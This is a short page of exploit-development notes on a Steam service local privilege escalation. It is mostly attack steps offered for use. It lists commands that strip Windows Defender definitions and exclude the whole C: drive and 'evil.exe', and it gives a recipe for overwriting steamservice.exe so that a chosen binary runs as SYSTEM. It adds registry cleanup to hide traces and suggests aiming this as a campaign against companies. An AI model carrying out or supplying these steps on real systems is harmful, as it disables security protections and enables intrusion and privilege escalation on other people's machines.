Exploit Development Training & Learning
This really isn't called this CVE, but since Valve decided not to patch it. Related. Requires AMSI bypass to make this work. Two variations: add user and drop malicious file.
Several options to consider:
- "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
- powershellAdd-MpPreference -ExclusionPath "C:" & Add-MpPreference -ExclusionProcess "C:\evil.exe"
- Add an AMSI bypass to this, this becomes an effective campaign against companies who use steam for LAN parties on their work laptops (they exist).
Cleanup:
- For complete cleanup, at the end: regln-x64.exe -d HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc
- Download: https://github.com/tenox7/regln/releases
Another example of Steam/Valve Exploitation:
- Log on as non-admin on a box with steam
- Do not start steam or any game
- cat %system32%\calc.exe > %programfiles%\steam\bin\steamservice.exe
- Reboot
- Log on, start steam
- Now you have calc.exe (attempted to) run as System with highest local privileges
From 2015: https://nvd.nist.gov/vuln/detail/CVE-2015-7985
Credits: Matt Nelson (@enigma0x3)